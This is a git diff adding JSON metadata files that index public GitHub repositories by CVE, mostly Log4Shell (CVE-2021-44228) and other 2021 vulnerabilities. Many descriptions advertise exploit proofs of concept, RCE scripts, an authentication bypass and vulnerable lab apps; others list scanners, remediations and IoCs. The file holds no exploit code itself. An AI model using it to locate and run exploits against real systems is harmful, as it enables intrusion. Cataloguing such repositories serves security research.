+ "id": 616502386,
+ "name": "log4shell-vulnweb",
+ "full_name": "53buahapel\/log4shell-vulnweb",
+ "owner": {
+ "login": "53buahapel",
+ "id": 55012507,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55012507?v=4",
+ "html_url": "https:\/\/github.com\/53buahapel"
+ },
+ "html_url": "https:\/\/github.com\/53buahapel\/log4shell-vulnweb",
+ "description": "this web is vulnerable against CVE-2021-44228",
+ "fork": false,
+ "created_at": "2023-03-20T14:09:30Z",
+ "updated_at": "2023-06-17T19:43:29Z",
+ "pushed_at": "2023-04-03T19:33:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 622718899,
+ "name": "Log4ShellRemediation",
+ "full_name": "demonrvm\/Log4ShellRemediation",
+ "owner": {
+ "login": "demonrvm",
+ "id": 129688147,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129688147?v=4",
+ "html_url": "https:\/\/github.com\/demonrvm"
+ },
+ "html_url": "https:\/\/github.com\/demonrvm\/Log4ShellRemediation",
+ "description": "A vulnerable Spring Boot application that uses log4j and is vulnerable to CVE-2021-44228, CVE-2021-44832, CVE-2021-45046 and CVE-2021-45105",
+ "fork": false,
+ "created_at": "2023-04-02T23:03:28Z",
+ "updated_at": "2023-04-17T15:19:43Z",
+ "pushed_at": "2023-04-04T00:04:34Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 628273977,
+ "name": "log4j-exploit-fork-bomb",
+ "full_name": "funcid\/log4j-exploit-fork-bomb",
+ "owner": {
+ "login": "funcid",
+ "id": 42806772,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42806772?v=4",
+ "html_url": "https:\/\/github.com\/funcid"
+ },
+ "html_url": "https:\/\/github.com\/funcid\/log4j-exploit-fork-bomb",
+ "description": "💣💥💀 Proof of Concept: пример запуска fork-бомбы на удаленном сервере благодаря уязвимости CVE-2021-44228",
+ "fork": false,
+ "created_at": "2023-04-15T12:47:39Z",
+ "updated_at": "2023-05-06T18:26:50Z",
+ "pushed_at": "2023-05-02T21:46:29Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 660080340,
+ "name": "PY-Log4j-RCE-Scanner",
+ "full_name": "MrHarshvardhan\/PY-Log4j-RCE-Scanner",
+ "owner": {
+ "login": "MrHarshvardhan",
+ "id": 49817411,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49817411?v=4",
+ "html_url": "https:\/\/github.com\/MrHarshvardhan"
+ },
+ "html_url": "https:\/\/github.com\/MrHarshvardhan\/PY-Log4j-RCE-Scanner",
+ "description": "Using this tool, you can scan for remote command execution vulnerability CVE-2021-44228 on Apache Log4j at multiple addresses.",
+ "fork": false,
+ "created_at": "2023-06-29T07:46:40Z",
+ "updated_at": "2024-03-11T16:09:06Z",
+ "pushed_at": "2023-06-29T08:14:23Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 668405235,
+ "name": "Log4j_CVE-2021-44228",
+ "full_name": "Muhammad-Ali007\/Log4j_CVE-2021-44228",
+ "owner": {
+ "login": "Muhammad-Ali007",
+ "id": 64638296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64638296?v=4",
+ "html_url": "https:\/\/github.com\/Muhammad-Ali007"
+ },
+ "html_url": "https:\/\/github.com\/Muhammad-Ali007\/Log4j_CVE-2021-44228",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-07-19T18:18:16Z",
+ "updated_at": "2023-07-21T21:40:52Z",
+ "pushed_at": "2023-07-21T21:55:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 701169649,
+ "name": "CVE-2021-44228",
+ "full_name": "Tai-e\/CVE-2021-44228",
+ "owner": {
+ "login": "Tai-e",
+ "id": 100122463,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100122463?v=4",
+ "html_url": "https:\/\/github.com\/Tai-e"
+ },
+ "html_url": "https:\/\/github.com\/Tai-e\/CVE-2021-44228",
+ "description": "Utilize Tai-e to identify the Log4shell (a.k.a. CVE-2021-44228) Vulnerability",
+ "fork": false,
+ "created_at": "2023-10-06T04:36:31Z",
+ "updated_at": "2024-06-21T02:05:55Z",
+ "pushed_at": "2023-10-06T09:30:27Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "java",
+ "log4shell",
+ "security",
+ "taint-analysis"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 718233980,
+ "name": "CVE-2021-44228",
+ "full_name": "LucasPDiniz\/CVE-2021-44228",
+ "owner": {
+ "login": "LucasPDiniz",
+ "id": 57265360,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57265360?v=4",
+ "html_url": "https:\/\/github.com\/LucasPDiniz"
+ },
+ "html_url": "https:\/\/github.com\/LucasPDiniz\/CVE-2021-44228",
+ "description": "Log4j Vulnerability RCE - CVE-2021-44228",
+ "fork": false,
+ "created_at": "2023-11-13T16:57:22Z",
+ "updated_at": "2023-11-13T17:09:40Z",
+ "pushed_at": "2024-03-01T00:48:28Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "2021",
+ "cve-2021-44228",
+ "log4j",
+ "rce",
+ "solaris",
+ "solr",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 721701932,
+ "name": "log4shell-minecraft-demo",
+ "full_name": "felixslama\/log4shell-minecraft-demo",
+ "owner": {
+ "login": "felixslama",
+ "id": 79058712,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79058712?v=4",
+ "html_url": "https:\/\/github.com\/felixslama"
+ },
+ "html_url": "https:\/\/github.com\/felixslama\/log4shell-minecraft-demo",
+ "description": "Log4Shell (CVE-2021-44228) minecraft demo. Used for education fairs",
+ "fork": false,
+ "created_at": "2023-11-21T15:45:31Z",
+ "updated_at": "2023-11-21T18:27:18Z",
+ "pushed_at": "2023-11-21T18:30:32Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 725731160,
+ "name": "log4shell_lab",
+ "full_name": "ShlomiRex\/log4shell_lab",
+ "owner": {
+ "login": "ShlomiRex",
+ "id": 17744127,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17744127?v=4",
+ "html_url": "https:\/\/github.com\/ShlomiRex"
+ },
+ "html_url": "https:\/\/github.com\/ShlomiRex\/log4shell_lab",
+ "description": "CVE-2021-44228",
+ "fork": false,
+ "created_at": "2023-11-30T18:55:40Z",
+ "updated_at": "2024-03-25T13:50:22Z",
+ "pushed_at": "2024-02-01T00:09:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 728564712,
+ "name": "CVE-Lab",
+ "full_name": "dcm2406\/CVE-Lab",
+ "owner": {
+ "login": "dcm2406",
+ "id": 106772368,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106772368?v=4",
+ "html_url": "https:\/\/github.com\/dcm2406"
+ },
+ "html_url": "https:\/\/github.com\/dcm2406\/CVE-Lab",
+ "description": "Instructions for exploiting vulnerabilities CVE-2021-44228 and CVE-2023-46604",
+ "fork": false,
+ "created_at": "2023-12-07T08:02:53Z",
+ "updated_at": "2024-03-21T06:45:44Z",
+ "pushed_at": "2024-03-20T06:20:44Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 732890890,
+ "name": "l4j-tp1",
+ "full_name": "scabench\/l4j-tp1",
+ "owner": {
+ "login": "scabench",
+ "id": 154115874,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154115874?v=4",
+ "html_url": "https:\/\/github.com\/scabench"
+ },
+ "html_url": "https:\/\/github.com\/scabench\/l4j-tp1",
+ "description": "jee web project with log4shell (CVE-2021-44228) vulnerability",
+ "fork": false,
+ "created_at": "2023-12-18T05:07:59Z",
+ "updated_at": "2023-12-27T22:59:23Z",
+ "pushed_at": "2024-01-09T04:10:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 736198962,
+ "name": "l4j-fp1",
+ "full_name": "scabench\/l4j-fp1",
+ "owner": {
+ "login": "scabench",
+ "id": 154115874,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154115874?v=4",
+ "html_url": "https:\/\/github.com\/scabench"
+ },
+ "html_url": "https:\/\/github.com\/scabench\/l4j-fp1",
+ "description": "jee web project with sanitised log4shell (CVE-2021-44228) vulnerability",
+ "fork": false,
+ "created_at": "2023-12-27T08:49:38Z",
+ "updated_at": "2023-12-27T22:59:37Z",
+ "pushed_at": "2024-01-14T23:40:01Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 772721921,
+ "name": "l4s-vulnapp",
+ "full_name": "KtokKawu\/l4s-vulnapp",
+ "owner": {
+ "login": "KtokKawu",
+ "id": 16015720,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16015720?v=4",
+ "html_url": "https:\/\/github.com\/KtokKawu"
+ },
+ "html_url": "https:\/\/github.com\/KtokKawu\/l4s-vulnapp",
+ "description": "This is a potentially vulnerable Java web application containing Log4j affected by log4shell(CVE-2021-44228).",
+ "fork": false,
+ "created_at": "2024-03-15T18:57:11Z",
+ "updated_at": "2024-03-15T19:37:44Z",
+ "pushed_at": "2024-03-15T19:37:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 776289709,
+ "name": "CVE-2021-44228-POC",
+ "full_name": "sec13b\/CVE-2021-44228-POC",
+ "owner": {
+ "login": "sec13b",
+ "id": 123419537,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123419537?v=4",
+ "html_url": "https:\/\/github.com\/sec13b"
+ },
+ "html_url": "https:\/\/github.com\/sec13b\/CVE-2021-44228-POC",
+ "description": "exploit CVE-2021-44228 ",
+ "fork": false,
+ "created_at": "2024-03-23T05:03:44Z",
+ "updated_at": "2024-04-24T00:59:25Z",
+ "pushed_at": "2024-04-24T00:59:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 777920527,
+ "name": "Wireshark",
+ "full_name": "KirkDJohnson\/Wireshark",
+ "owner": {
+ "login": "KirkDJohnson",
+ "id": 164972007,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/164972007?v=4",
+ "html_url": "https:\/\/github.com\/KirkDJohnson"
+ },
+ "html_url": "https:\/\/github.com\/KirkDJohnson\/Wireshark",
+ "description": "Downloaded a packet capture (.pcapng) file from malware-traffic-analysis.net which was an example of an attempted attack against a webserver using the Log4J vulnerability (CVE-2021-44228). I examined teh amount of endpoints communicating with the server and knowing jnidi as a common in the vulnerbilty found it in clear text",
+ "fork": false,
+ "created_at": "2024-03-26T18:47:20Z",
+ "updated_at": "2024-05-22T23:57:34Z",
+ "pushed_at": "2024-05-22T23:57:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 780990164,
+ "name": "LOGJ4_PocShell_CVE-2021-44228",
+ "full_name": "YangHyperData\/LOGJ4_PocShell_CVE-2021-44228",
+ "owner": {
+ "login": "YangHyperData",
+ "id": 131573711,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/131573711?v=4",
+ "html_url": "https:\/\/github.com\/YangHyperData"
+ },
+ "html_url": "https:\/\/github.com\/YangHyperData\/LOGJ4_PocShell_CVE-2021-44228",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-02T14:44:10Z",
+ "updated_at": "2024-04-25T05:35:07Z",
+ "pushed_at": "2024-04-25T05:35:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 807102558,
+ "name": "CVE-2021-44228-demo",
+ "full_name": "Hoanle396\/CVE-2021-44228-demo",
+ "owner": {
+ "login": "Hoanle396",
+ "id": 89791546,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89791546?v=4",
+ "html_url": "https:\/\/github.com\/Hoanle396"
+ },
+ "html_url": "https:\/\/github.com\/Hoanle396\/CVE-2021-44228-demo",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-28T13:40:20Z",
+ "updated_at": "2024-05-28T13:43:00Z",
+ "pushed_at": "2024-05-28T13:42:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 812482563,
+ "name": "Exploiting-CVE-2021-44228-Log4Shell-in-a-Banking-Environment",
+ "full_name": "tadash10\/Exploiting-CVE-2021-44228-Log4Shell-in-a-Banking-Environment",
+ "owner": {
+ "login": "tadash10",
+ "id": 126980610,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/126980610?v=4",
+ "html_url": "https:\/\/github.com\/tadash10"
+ },
+ "html_url": "https:\/\/github.com\/tadash10\/Exploiting-CVE-2021-44228-Log4Shell-in-a-Banking-Environment",
+ "description": "Objective: Demonstrate the exploitation of the Log4Shell vulnerability (CVE-2021-44228) within a simulated banking application environment.",
+ "fork": false,
+ "created_at": "2024-06-09T02:49:42Z",
+ "updated_at": "2024-06-14T02:52:30Z",
+ "pushed_at": "2024-06-14T02:52:27Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-44255.json b/2021/CVE-2021-44255.json
new file mode 100644
index 0000000000..8a8066b2d9
--- /dev/null
+++ b/2021/CVE-2021-44255.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 420164946,
+ "name": "motioneye-authenticated-RCE",
+ "full_name": "pizza-power\/motioneye-authenticated-RCE",
+ "owner": {
+ "login": "pizza-power",
+ "id": 6135659,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6135659?v=4",
+ "html_url": "https:\/\/github.com\/pizza-power"
+ },
+ "html_url": "https:\/\/github.com\/pizza-power\/motioneye-authenticated-RCE",
+ "description": "A Python 3 script that uploads a tasks.pickle file that enables RCE in MotionEye. CVE-2021-44255",
+ "fork": false,
+ "created_at": "2021-10-22T16:15:08Z",
+ "updated_at": "2022-04-18T11:39:50Z",
+ "pushed_at": "2022-11-02T18:40:17Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-44270.json b/2021/CVE-2021-44270.json
new file mode 100644
index 0000000000..9a2838b4c7
--- /dev/null
+++ b/2021/CVE-2021-44270.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 431144766,
+ "name": "Anviz-Access-Control-Authentication-Bypass",
+ "full_name": "pinpinsec\/Anviz-Access-Control-Authentication-Bypass",
+ "owner": {
+ "login": "pinpinsec",
+ "id": 94911442,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94911442?v=4",
+ "html_url": "https:\/\/github.com\/pinpinsec"
+ },
+ "html_url": "https:\/\/github.com\/pinpinsec\/Anviz-Access-Control-Authentication-Bypass",
+ "description": "CVE-2021-44270",
+ "fork": false,
+ "created_at": "2021-11-23T15:04:23Z",
+ "updated_at": "2022-01-08T07:32:06Z",
+ "pushed_at": "2024-02-08T10:00:43Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-4428.json b/2021/CVE-2021-4428.json
new file mode 100644
index 0000000000..db2f11bd5a
--- /dev/null
+++ b/2021/CVE-2021-4428.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 440457055,
+ "name": "Log4Shell",
+ "full_name": "CERT-hr\/Log4Shell",
+ "owner": {
+ "login": "CERT-hr",
+ "id": 42938844,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42938844?v=4",
+ "html_url": "https:\/\/github.com\/CERT-hr"
+ },
+ "html_url": "https:\/\/github.com\/CERT-hr\/Log4Shell",
+ "description": "This repo contains IoCs which are associated with exploitation of CVE-2021-4428.",
+ "fork": false,
+ "created_at": "2021-12-21T09:17:08Z",
+ "updated_at": "2021-12-21T09:17:11Z",
+ "pushed_at": "2021-12-23T22:55:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-44428.json b/2021/CVE-2021-44428.json
new file mode 100644
index 0000000000..1ac7c7be7e
--- /dev/null
+++ b/2021/CVE-2021-44428.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 449086094,
+ "name": "log4jtest",
+ "full_name": "z3bul0n\/log4jtest",
+ "owner": {
+ "login": "z3bul0n",
+ "id": 97850188,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97850188?v=4",
+ "html_url": "https:\/\/github.com\/z3bul0n"
+ },
+ "html_url": "https:\/\/github.com\/z3bul0n\/log4jtest",
+ "description": "Terraform and Docker resources for quickly spinning up a test of CVE-2021-44428",
+ "fork": false,
+ "created_at": "2022-01-18T00:09:11Z",
+ "updated_at": "2022-01-18T22:37:01Z",
+ "pushed_at": "2022-01-18T01:17:23Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-44521.json b/2021/CVE-2021-44521.json
new file mode 100644
index 0000000000..16af8961d1
--- /dev/null
+++ b/2021/CVE-2021-44521.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 463116248,
+ "name": "CVE-2021-44521",
+ "full_name": "WoodenKlaas\/CVE-2021-44521",
+ "owner": {
+ "login": "WoodenKlaas",
+ "id": 26481794,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26481794?v=4",
+ "html_url": "https:\/\/github.com\/WoodenKlaas"
+ },
+ "html_url": "https:\/\/github.com\/WoodenKlaas\/CVE-2021-44521",
+ "description": "Automated PoC of CVE-2021-44521",
+ "fork": false,
+ "created_at": "2022-02-24T11:07:34Z",
+ "updated_at": "2023-04-18T06:06:57Z",
+ "pushed_at": "2022-02-24T12:04:40Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 573925245,
+ "name": "poc-CVE-2021-44521",
+ "full_name": "Yeyvo\/poc-CVE-2021-44521",
+ "owner": {
+ "login": "Yeyvo",
+ "id": 20130066,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20130066?v=4",
+ "html_url": "https:\/\/github.com\/Yeyvo"
+ },
+ "html_url": "https:\/\/github.com\/Yeyvo\/poc-CVE-2021-44521",
+ "description": "full PoC of CVE-2021-44521 ",
+ "fork": false,
+ "created_at": "2022-12-03T21:35:30Z",
+ "updated_at": "2022-12-03T21:44:51Z",
+ "pushed_at": "2022-12-03T21:44:47Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-44529.json b/2021/CVE-2021-44529.json
new file mode 100644
index 0000000000..a45d8926e6
--- /dev/null
+++ b/2021/CVE-2021-44529.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 473450134,
+ "name": "CVE-2021-44529",
+ "full_name": "jkana\/CVE-2021-44529",
+ "owner": {
+ "login": "jkana",
+ "id": 52318947,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52318947?v=4",
+ "html_url": "https:\/\/github.com\/jkana"
+ },
+ "html_url": "https:\/\/github.com\/jkana\/CVE-2021-44529",
+ "description": "CVE-2021-44529 PoC",
+ "fork": false,
+ "created_at": "2022-03-24T03:58:16Z",
+ "updated_at": "2023-12-30T17:41:58Z",
+ "pushed_at": "2022-03-24T04:07:34Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 482288380,
+ "name": "CVE-2021-44529",
+ "full_name": "jax7sec\/CVE-2021-44529",
+ "owner": {
+ "login": "jax7sec",
+ "id": 102047728,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102047728?v=4",
+ "html_url": "https:\/\/github.com\/jax7sec"
+ },
+ "html_url": "https:\/\/github.com\/jax7sec\/CVE-2021-44529",
+ "description": "CVE-2021-44529 Ivanti EPM 云服务设备 (CSA) 中的代码注入漏洞允许未经身份验证的用户以有限的权限(nobody)执行任意代码。",
+ "fork": false,
+ "created_at": "2022-04-16T15:19:39Z",
+ "updated_at": "2023-09-28T11:38:01Z",
+ "pushed_at": "2022-04-16T15:20:10Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-44582.json b/2021/CVE-2021-44582.json
new file mode 100644
index 0000000000..1d5fdbec58
--- /dev/null
+++ b/2021/CVE-2021-44582.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 501963723,
+ "name": "CVE-2021-44582",
+ "full_name": "warmachine-57\/CVE-2021-44582",
+ "owner": {
+ "login": "warmachine-57",
+ "id": 51786945,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51786945?v=4",
+ "html_url": "https:\/\/github.com\/warmachine-57"
+ },
+ "html_url": "https:\/\/github.com\/warmachine-57\/CVE-2021-44582",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-06-10T08:32:28Z",
+ "updated_at": "2022-06-10T08:32:28Z",
+ "pushed_at": "2022-06-10T08:39:45Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-44593.json b/2021/CVE-2021-44593.json
new file mode 100644
index 0000000000..45b55ec0a1
--- /dev/null
+++ b/2021/CVE-2021-44593.json
@@ -0,0 +1,36 @@
+[
+ {
+ "id": 450413894,
+ "name": "CVE-2021-44593",
+ "full_name": "Mister-Joe\/CVE-2021-44593",
+ "owner": {
+ "login": "Mister-Joe",
+ "id": 16895391,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16895391?v=4",
+ "html_url": "https:\/\/github.com\/Mister-Joe"
+ },
+ "html_url": "https:\/\/github.com\/Mister-Joe\/CVE-2021-44593",
+ "description": "Public disclosure & writeup of CVE-2021-44593.",
+ "fork": false,
+ "created_at": "2022-01-21T08:36:25Z",
+ "updated_at": "2022-05-24T20:54:00Z",
+ "pushed_at": "2022-01-21T08:53:22Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "2021-44593",
+ "cve",
+ "cve-2021-44593"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-44731.json b/2021/CVE-2021-44731.json
new file mode 100644
index 0000000000..f577d6326e
--- /dev/null
+++ b/2021/CVE-2021-44731.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 664227496,
+ "name": "CVE-2021-44731-snap-confine-SUID",
+ "full_name": "deeexcee-io\/CVE-2021-44731-snap-confine-SUID",
+ "owner": {
+ "login": "deeexcee-io",
+ "id": 130473605,
